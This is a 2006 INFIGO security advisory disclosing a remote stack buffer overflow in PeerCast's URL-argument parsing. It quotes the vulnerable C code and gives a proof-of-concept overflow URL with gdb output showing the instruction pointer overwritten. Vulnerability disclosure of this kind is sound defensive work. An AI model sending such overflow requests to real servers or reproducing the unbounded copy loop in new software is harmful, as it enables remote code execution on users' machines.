INFIGO-2006-03-01: PeerCast streaming server remote buffer overflow
INFIGO IS Security Advisory #INFIGO-2006-03-01
http://www.infigo.hr/
Title: PeerCast streaming server remote buffer overflow
Advisory ID: INFIGO-2006-03-01
Date: 2006-03-08
Advisory URL: http://www.infigo.hr/in_focus/INFIGO-2006-03-01
Impact: Remote code execution
Risk Level: High
Vulnerability Type: Remote and local
Vendors Status: Vendor was first contacted on 7th March 2006.
==[ Overview
PeerCast is a simple, free way to listen to radio and watch video on the
Internet. It uses P2P technology to let anyone become a broadcaster
without the costs of traditional streaming. This means you get to hear and
watch stations not normally found on commercially funded sites.
PeerCast is available for Linux, Windows and MacOS platforms.
More information can be found on http://www.peercast.org.
==[ Vulnerability
After short research, high-risk vulnerability was discovered in PeerCast
Streaming server. Unauthenticated remote user can send specially crafted
request to the HTTP server that will cause stack overflow, what can be
easily exploited for remote code execution. The problem is present in URL
handling code. When user requests special URL on the server (like
'stream'), arguments are processed with procConnectArgs() function.
Vulnerable code in /code/common/servmgr.cpp
----------------------------------------
void ServMgr::procConnectArgs(char *str,ChanInfo &info)
{
char arg[512];
char curr[256];
char *args = strstr(str,"?");
if (args)
*args++=0;
info.initNameID(str);
if (args)
{
while (args=nextCGIarg(args,curr,arg))
{
...
...
...
----------------------------------------
Function procConnectArgs() will process arguments (char *str) passed to
the server script. Both buffers (arg[512] and curr[256]) allocated on the
stack can be overflowed inside of nextCGIarg() function in while() loop if
too long string is passed after '?' character in URL.
Vulnerable code in /code/common/servhs.cpp:
-------------------------------------------
char *nextCGIarg(char *cp, char *cmd, char *arg)
{
if (!*cp)
return NULL;
// fetch command
while (*cp)
{
char c = *cp++;
if (c == '=')
break;
else
*cmd++ = c;
}
*cmd = 0;
// fetch arg
while (*cp)
{
char c = *cp++;
if (c == '&')
break;
else
*arg++ = c;
}
*arg = 0;
return cp;
}
----------------------------------------
==[ Affected Version
PeerCast v0.1215 and lower.
==[ Fix
Upgrade to PeerCast v0.1217
==[ PoC Exploit
URL:
http://localhost:7144/stream/?AAAAAAAAAAAAAAAAAAAAAAA....(800)
gdb output...
[Switching to Thread 180236 (LWP 4526)]
0x41414141 in ?? ()
(gdb) i r
eax 0x0 0
ecx 0x74 116
edx 0x741c9f20 1948032800
ebx 0x4011fff4 1074921460
esp 0xbe3f9e84 0xbe3f9e84
ebp 0x41414141 0x41414141
esi 0x41414141 1094795585
edi 0x41414141 1094795585
eip 0x41414141 0x41414141
eflags 0x210246 2163270
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x0 0
(gdb)
==[ Credits
Vulnerability discovered by Leon Juranic <leon.juranic@xxxxxxxxx>.
==[ Contact
INFIGO IS
Web: http://www.infigo.hr
E-mail: infocus@xxxxxxxxx